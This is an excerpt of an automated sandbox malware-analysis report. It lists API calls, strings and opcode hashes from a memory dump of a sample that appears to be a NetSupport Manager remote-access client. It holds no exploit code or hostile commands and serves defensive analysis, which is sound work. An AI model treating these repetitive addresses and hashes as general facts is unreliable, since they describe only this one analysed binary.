                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106F3E8
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 1106F408
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeavewsprintf
                                                                                    • String ID: %s:%d$(null)$ListenPort$NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s$Port$TCPIP$UseNCS$tracerecv
                                                                                    • API String ID: 3005300677-3496508882
                                                                                    • Opcode ID: 813a8df51b421849a73fb34c3018abb507ddb1008c2509d1f87bc1f88576a655
                                                                                    • Instruction ID: 2680b2d19a9bdf8eb0956d8c99ae1cac6e929f7b4449284ea49473897193c40b
                                                                                    • Opcode Fuzzy Hash: 813a8df51b421849a73fb34c3018abb507ddb1008c2509d1f87bc1f88576a655
                                                                                    • Instruction Fuzzy Hash: 9EB1A375E0022A9FDB14DF65CC50FAAB7B9AF49708F4041DCE909A7241EB71A981CF62
                                                                                    APIs
                                                                                    • IsWindow.USER32(?), ref: 11047211
                                                                                    • _malloc.LIBCMT ref: 110472AD
                                                                                    • _memmove.LIBCMT ref: 11047312
                                                                                    • SendMessageTimeoutA.USER32(?,0000004A,00030462,00000005,00000002,00002710,?), ref: 11047372
                                                                                    • _free.LIBCMT ref: 11047379
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • Part of subcall function 11043870: _free.LIBCMT ref: 11043907
                                                                                      • Part of subcall function 11043870: _free.LIBCMT ref: 11043927
                                                                                      • Part of subcall function 11043870: _strncpy.LIBCMT ref: 11043955
                                                                                      • Part of subcall function 11043870: _strncpy.LIBCMT ref: 11043992
                                                                                      • Part of subcall function 11043870: _malloc.LIBCMT ref: 110439CC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$Message_malloc_strncpy$ErrorExitLastProcessSendTimeoutWindow_memmovewsprintf
                                                                                    • String ID: IsA()$SurveyResults$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                    • API String ID: 3960737985-1318765656
                                                                                    • Opcode ID: 6f3482f183dc71e32b0e781e0e1ae71b2587e219f1bd543c2aaaf4bdd4110b9c
                                                                                    • Instruction ID: e7dd2455d00588b8b0596ee18c4208b20e6f9302996f578dcf6f33cfb97cf12a
                                                                                    • Opcode Fuzzy Hash: 6f3482f183dc71e32b0e781e0e1ae71b2587e219f1bd543c2aaaf4bdd4110b9c
                                                                                    • Instruction Fuzzy Hash: 18C1A374E0064A9FDB04DFE4C8D0EEEF7B5BF88308F208168D519AB295DB70A945CB90
                                                                                    APIs
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1102D1C0
                                                                                      • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 111603F8
                                                                                      • Part of subcall function 111603E3: __CxxThrowException@8.LIBCMT ref: 1116040D
                                                                                      • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 1116041E
                                                                                    • _memmove.LIBCMT ref: 1102D24A
                                                                                    • _memmove.LIBCMT ref: 1102D26E
                                                                                    • _memmove.LIBCMT ref: 1102D2A8
                                                                                    • _memmove.LIBCMT ref: 1102D2C4
                                                                                    • std::exception::exception.LIBCMT ref: 1102D30E
                                                                                    • __CxxThrowException@8.LIBCMT ref: 1102D323
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                    • String ID: deque<T> too long
                                                                                    • API String ID: 827257264-309773918
                                                                                    • Opcode ID: 6f44853749167e6417c702704c1d5fd1f6b6aa11f4fe1b268de19c2d7f3316e5
                                                                                    • Instruction ID: ae58a47b93f5c67beecf59276473b3909c5d487f19c470db74dff325715f4f31
                                                                                    • Opcode Fuzzy Hash: 6f44853749167e6417c702704c1d5fd1f6b6aa11f4fe1b268de19c2d7f3316e5
                                                                                    • Instruction Fuzzy Hash: DD41A476E00105ABDB04CE68CC81AEEB7FAAF94324F59C669DC09DB344E675EE05C790
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Similarity
                                                                                    • API ID: __fread_nolock_fseek$_free_malloc_memset
                                                                                    • String ID: PCIR
                                                                                    • API String ID: 2419779768-1011558323
                                                                                    • Opcode ID: 81c3817886dc5dbe589c173359df18430558f154d2dd439929bf4d11460d0680
                                                                                    • Instruction ID: 1ccd7dea2f775c367685aa3e1c73f4b59a6156879e869ee7e214f681fe7cb03c
                                                                                    • Opcode Fuzzy Hash: 81c3817886dc5dbe589c173359df18430558f154d2dd439929bf4d11460d0680
                                                                                    • Instruction Fuzzy Hash: A94106B1F01318ABEB10CFA4DD41BDEB7BEEF81308F104069EC09AB240DA72A901C795
                                                                                    APIs
                                                                                    • SetPropA.USER32(?,?), ref: 1101556F
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • Part of subcall function 11015290: BeginPaint.USER32(?,?), ref: 110152BF
                                                                                      • Part of subcall function 11015290: GetWindowRect.USER32(?,?), ref: 110152D7
                                                                                      • Part of subcall function 11015290: _memset.LIBCMT ref: 110152E5
                                                                                      • Part of subcall function 11015290: CreateFontIndirectA.GDI32(?), ref: 11015301
                                                                                      • Part of subcall function 11015290: SelectObject.GDI32(00000000,00000000), ref: 11015315
                                                                                      • Part of subcall function 11015290: SetBkMode.GDI32(00000000,00000001), ref: 11015320
                                                                                      • Part of subcall function 11015290: BeginPath.GDI32(00000000), ref: 1101532D
                                                                                      • Part of subcall function 11015290: TextOutA.GDI32(00000000,00000000,00000000), ref: 11015350
                                                                                      • Part of subcall function 11015290: EndPath.GDI32(00000000), ref: 11015357
                                                                                      • Part of subcall function 11015290: PathToRegion.GDI32(00000000), ref: 1101535E
                                                                                      • Part of subcall function 11015290: CreateSolidBrush.GDI32(?), ref: 11015370
                                                                                      • Part of subcall function 11015290: CreateSolidBrush.GDI32(?), ref: 11015386
                                                                                      • Part of subcall function 11015290: CreatePen.GDI32(00000000,00000002,?), ref: 110153A0
                                                                                      • Part of subcall function 11015290: SelectObject.GDI32(00000000,00000000), ref: 110153AE
                                                                                      • Part of subcall function 11015290: SelectObject.GDI32(00000000,?), ref: 110153BE
                                                                                      • Part of subcall function 11015290: GetRgnBox.GDI32(00000000,?), ref: 110153CB
                                                                                    • GetPropA.USER32(?), ref: 1101557E
                                                                                    • wsprintfA.USER32 ref: 110155B3
                                                                                    • RemovePropA.USER32(?), ref: 110155E8
                                                                                    • DefWindowProcA.USER32(?,?,?,?), ref: 11015611
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create$ObjectPathPropSelect$BeginBrushSolidWindowwsprintf$ErrorExitFontIndirectLastMessageModePaintProcProcessRectRegionRemoveText_memset
                                                                                    • String ID: ..\ctl32\NSMIdentifyWnd.cpp$NSMIdentifyWnd::m_aProp$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
                                                                                    • API String ID: 1924375018-841114059
                                                                                    • Opcode ID: 349e3198e4ee11d8f994cce4f4d7fe91b877becd306935b01eaf7a21f5783bae
                                                                                    • Instruction ID: fc00b609a2f261b647cf9ab1963ef075e81928135c8218ba30019119ab5d925d
                                                                                    • Opcode Fuzzy Hash: 349e3198e4ee11d8f994cce4f4d7fe91b877becd306935b01eaf7a21f5783bae
                                                                                    • Instruction Fuzzy Hash: 1131E775E01029ABD714DFA4DC80FBEB379EF4A309F04406AF51A9F148EA7A9940CB71
                                                                                    APIs
                                                                                    • GetMenuItemCount.USER32(?), ref: 1100519E
                                                                                    • _memset.LIBCMT ref: 110051C0
                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 110051D4
                                                                                    • CheckMenuItem.USER32(?,00000000,00000000), ref: 11005231
                                                                                    • EnableMenuItem.USER32(?,00000000,00000000), ref: 11005247
                                                                                    • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005268
                                                                                    • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005294
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 2755257978-4108050209
                                                                                    • Opcode ID: ed19a4d0eac54c607b6a919a5e70af2297959f222d84ccf27589c69c777b0ba6
                                                                                    • Instruction ID: ff6163613c0a8cbc830ef1528835912891ededd95cc8b4eaa22ca2fcf9c2cdf5
                                                                                    • Opcode Fuzzy Hash: ed19a4d0eac54c607b6a919a5e70af2297959f222d84ccf27589c69c777b0ba6
                                                                                    • Instruction Fuzzy Hash: 71318E70D11219ABEB01DFA4D885BEEBBFCEF46758F008059F951E6240E7759944CB60
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 1101D1E0
                                                                                    • GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D1FA
                                                                                    • _memset.LIBCMT ref: 1101D20A
                                                                                    • RegisterClassExA.USER32(?), ref: 1101D24B
                                                                                    • CreateWindowExA.USER32(00000000,NSMChatSizeWnd,11194244,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 1101D27E
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 1101D28B
                                                                                    • DestroyWindow.USER32(00000000), ref: 1101D292
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Class_memset$CreateDestroyInfoRectRegister
                                                                                    • String ID: NSMChatSizeWnd
                                                                                    • API String ID: 2883038198-4119039562
                                                                                    • Opcode ID: 87aebd6e18ee9abdefb850bcd11d4769ee8e47b38e4dbf48374c28c167509a6c
                                                                                    • Instruction ID: df00defde950c6a972f57fa33671139d82de9fa74eae4c6bde258e6239c9b3d1
                                                                                    • Opcode Fuzzy Hash: 87aebd6e18ee9abdefb850bcd11d4769ee8e47b38e4dbf48374c28c167509a6c
                                                                                    • Instruction Fuzzy Hash: C7314DB5D0021DAFDB10DFA5DD84BEEF7B8EB44628F20012EE925B7240D735A905CB64
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 1103D18F
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000125), ref: 1103D1BD
                                                                                    • CloseHandle.KERNEL32(?), ref: 1103D25C
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1103D26C
                                                                                    • CloseHandle.KERNEL32(?), ref: 1103D279
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$FileModuleNameObjectSingleWait_memset
                                                                                    • String ID: /247$" /a$RunAnnot
                                                                                    • API String ID: 2581068044-4059077130
                                                                                    • Opcode ID: b839e70076fc368ba000d97afe45d019281ed31407febcd3e3d047b5c4491ca4
                                                                                    • Instruction ID: dc76f3c11fb5ad4c0452055a60ef983052eda761819ccc7684b04031b26646f7
                                                                                    • Opcode Fuzzy Hash: b839e70076fc368ba000d97afe45d019281ed31407febcd3e3d047b5c4491ca4
                                                                                    • Instruction Fuzzy Hash: 4541C030A04319AFEB11DFA4CC84FDDB7B9EB48704F1080A5E6589B284DB71E944CF90
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,?,?,?,?,1102E011,?,?,11194244,Trying to get mac addr for %u.%u.%u.%u,?,000000FF,?,?), ref: 1112B295
                                                                                    • GetProcAddress.KERNEL32(00000000,SendARP), ref: 1112B2AE
                                                                                    • wsprintfA.USER32 ref: 1112B2FB
                                                                                    • wsprintfA.USER32 ref: 1112B313
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,1102E011), ref: 1112B328
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Similarity
                                                                                    • API ID: Librarywsprintf$AddressFreeLoadProc
                                                                                    • String ID: %02x$IPHLPAPI.DLL$SendARP
                                                                                    • API String ID: 435568443-4085816232
                                                                                    • Opcode ID: 059c12f073bdf147a91715eca9bcb01dfedc32bce9f3742e1109da8ce792d870
                                                                                    • Instruction ID: 7d96227945af9bb0c0fa81f266df54215dce15e5fec16fb5673a6d202f8b9dc6
                                                                                    • Opcode Fuzzy Hash: 059c12f073bdf147a91715eca9bcb01dfedc32bce9f3742e1109da8ce792d870
                                                                                    • Instruction Fuzzy Hash: 87216D75E001299BCB14CFA6CD85AEEFBB8FF8D614F550118EC14A3300E635AE05CBA4
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 11037267
                                                                                      • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                      • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                    • _free.LIBCMT ref: 1103728F
                                                                                    • _strncpy.LIBCMT ref: 110372BB
                                                                                    • _strncpy.LIBCMT ref: 110372F8
                                                                                    • _malloc.LIBCMT ref: 11037332
                                                                                    • _strncpy.LIBCMT ref: 11037343
                                                                                    • _strncpy.LIBCMT ref: 11037383
                                                                                    • _malloc.LIBCMT ref: 110373B6
                                                                                    • _strncpy.LIBCMT ref: 110373CC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _strncpy$_free_malloc$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 1102513549-0
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(00000000,11195920), ref: 1100D3A4
                                                                                    • GetProcAddress.KERNEL32(00000000,11195910), ref: 1100D3B8
                                                                                    • GetProcAddress.KERNEL32(00000000,11195900), ref: 1100D3CD
                                                                                    • GetProcAddress.KERNEL32(00000000,111958F0), ref: 1100D3E1
                                                                                    • GetProcAddress.KERNEL32(00000000,111958E4), ref: 1100D3F5
                                                                                    • GetProcAddress.KERNEL32(00000000,111958C4), ref: 1100D40A
                                                                                    • GetProcAddress.KERNEL32(00000000,111958A4), ref: 1100D41E
                                                                                    • GetProcAddress.KERNEL32(00000000,11195894), ref: 1100D432
                                                                                    • GetProcAddress.KERNEL32(00000000,11195884), ref: 1100D447
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc
                                                                                    • String ID:
                                                                                    • API String ID: 190572456-0
                                                                                    APIs
                                                                                    • GetStockObject.GDI32(00000007), ref: 11113167
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 11113176
                                                                                    • SetBrushOrgEx.GDI32(?,00000000,00000000,00000000,?,11119DB4,?,00000001,00000001,00000000,1111E6D7,00000000,?,00000000), ref: 11113181
                                                                                    • GetStockObject.GDI32(00000000), ref: 11113189
                                                                                    • SelectObject.GDI32(?,00000000), ref: 11113192
                                                                                    • GetStockObject.GDI32(0000000D), ref: 11113196
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 1111319F
                                                                                    • SelectClipRgn.GDI32(00000000,00000000), ref: 111131B3
                                                                                    • SelectClipRgn.GDI32(?,?), ref: 111131D5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Object$Select$Stock$Clip$Brush
                                                                                    • String ID:
                                                                                    • API String ID: 2690518013-0
                                                                                    APIs
                                                                                      • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • Part of subcall function 110B0260: _memset.LIBCMT ref: 110B026C
                                                                                      • Part of subcall function 110B0260: _memset.LIBCMT ref: 110B029D
                                                                                      • Part of subcall function 110B0AD0: timeGetTime.WINMM(_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B0AD6
                                                                                      • Part of subcall function 110B0AD0: timeGetTime.WINMM(111F00F8,111E5C98,?), ref: 110B0BA5
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FA,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B743D
                                                                                    • GetDC.USER32(00000000), ref: 110B7481
                                                                                    • GetDeviceCaps.GDI32(00000000,0000000E), ref: 110B748C
                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 110B7497
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 110B74A3
                                                                                      • Part of subcall function 110B3090: SetEvent.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30A8
                                                                                      • Part of subcall function 110B3090: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B30B5
                                                                                      • Part of subcall function 110B3090: CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30C8
                                                                                      • Part of subcall function 110B3090: CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30D5
                                                                                      • Part of subcall function 110B3090: WaitForSingleObject.KERNEL32(?,000003E8,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30F3
                                                                                      • Part of subcall function 110B3090: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B3100
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$CapsDeviceObjectSingleTimeWait_memsettime$EventRelease__wcstoi64
                                                                                    • String ID: TraceScrape$_debug
                                                                                    • API String ID: 2936113293-4091781993
                                                                                    APIs
                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11027053
                                                                                    • TranslateMessage.USER32(?), ref: 11027081
                                                                                    • DispatchMessageA.USER32(?), ref: 1102708B
                                                                                    • Sleep.KERNEL32(000003E8), ref: 11027114
                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1102717A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Message$DispatchSleepTranslate
                                                                                    • String ID: Bridge$BridgeThread::Attempting to open bridge...
                                                                                    • API String ID: 3237117195-3850961587
                                                                                    APIs
                                                                                    • GetWindowPlacement.USER32(00000000,0000002C,110BFEBC,?,Norm,110BFEBC), ref: 110B90E4
                                                                                    • MoveWindow.USER32(00000000,110BFEBC,110BFEBC,110BFEBC,110BFEBC,00000001,?,Norm,110BFEBC), ref: 110B9156
                                                                                    • SetTimer.USER32(00000000,0000050D,000007D0,00000000), ref: 110B91B1
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    Memory Dump Source
